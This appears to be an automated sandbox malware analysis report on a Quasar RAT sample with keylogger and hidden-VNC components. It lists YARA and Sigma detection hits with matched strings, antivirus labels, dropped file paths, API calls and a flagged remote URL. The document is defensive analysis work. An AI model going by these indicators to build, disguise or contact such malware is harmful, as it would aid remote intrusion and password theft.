10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
7.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
7.0.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c9ac50.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
1.2.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
1.2.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x1db64a:$s1: DoUploadAndExecute 0x1e0f61:$s2: DoDownloadAndExecute 0x1db420:$s3: DoShellExecute 0x1db842:$s4: set_Processname 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28 0x1aa56d:$op3: 00 04 03 69 91 1B 40 0x1aadcc:$op3: 00 04 03 69 91 1B 40
1.0.CVbJSUXraQ.exe.db0000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x1daea0:$x1: GetKeyloggerLogsResponse 0x1db0e0:$s1: DoShellExecuteResponse 0x1d44ce:$s2: GetPasswordsResponse 0x1dafb3:$s3: GetStartupItemsResponse 0x1d179c:$s4: <GetGenReader>b__7 0x1db65e:$s5: RunHidden 0x1db67c:$s5: RunHidden 0x1db68a:$s5: RunHidden 0x1db69e:$s5: RunHidden
1.0.CVbJSUXraQ.exe.db0000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.db0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Click to see the 458 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Avira: detection malicious, Label: TR/Hijacker.W

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Multi AV Scanner detection for submitted file

Show sources

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%	Perma Link
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%	Perma Link
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Antivirus / Scanner detection for submitted sample

Show sources

Source: CVbJSUXraQ.exe	Avira: detected
Source: CVbJSUXraQ.exe	Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: http://0x21.in:8000/_az/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Virustotal: Detection: 83%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Virustotal: Detection: 85%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\windef.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	ReversingLabs: Detection: 93%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Joe Sandbox ML: detected

Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack	Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack	Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack	Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack	Avira: Label: TR/AD.MoksSteal.elw

Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040A610 CryptUnprotectData,LocalFree,

Source: CVbJSUXraQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: z:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: x:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: v:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: t:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: r:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: p:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: n:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: l:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: j:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: h:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: f:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: b:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: y:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: w:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: u:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: s:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: q:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: o:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: m:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: k:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: i:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: g:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: e:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: c:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	File opened: a:

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
